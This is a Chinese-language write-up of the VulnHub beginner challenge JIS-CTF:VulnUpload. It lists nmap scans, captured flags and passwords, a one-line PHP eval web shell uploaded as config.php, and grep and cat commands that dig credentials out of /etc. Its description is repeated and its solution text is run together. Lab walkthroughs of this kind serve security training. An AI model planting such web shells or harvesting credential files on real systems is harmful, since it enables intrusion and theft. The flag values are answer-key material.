Jordaninfosec-CTF01
一、描述
VM名称:JIS-CTF:VulnUpload
难度:初学者
说明:本机上有五个标志。尝试找到它们。查找所有标志平均需要1.5个小时。
仅与VirtualBox一起使用
下载链接:https : //download.vulnhub.com/jisctf/JIS-CTF-VulnUpload-CTF01.ova二、问题解决

解决方案


三、开始训练



















最后更新于
VM名称:JIS-CTF:VulnUpload
难度:初学者
说明:本机上有五个标志。尝试找到它们。查找所有标志平均需要1.5个小时。
仅与VirtualBox一起使用
下载链接:https : //download.vulnhub.com/jisctf/JIS-CTF-VulnUpload-CTF01.ova





















最后更新于
ifconfignmap 192.168.1.238/24192.168.1.236nmap -A 192.168.1.236The 1st flag is : {8734509128730458630012095}username : admin
password : 3v1l_H@ck3r
The 2nd flag is : {7412574125871236547895214}<?php eval($_POST["giao"]);?>http://192.168.1.236/uploaded_files/config.phpThe 3rd flag is : {7645110034526579012345670}try to find user technawi password to read the flag.txt file, you can find it in a hidden file ;)technawigrep -rns technawi /etc/cat /etc/mysql/conf.d/credentials.txtThe 4th flag is : {7845658974123568974185412}
username : technawi
password : 3vilH@ksorThe 5th flag is : {5473215946785213456975249}
Good job :)
You find 5 flags and got their points and finish the first scenario....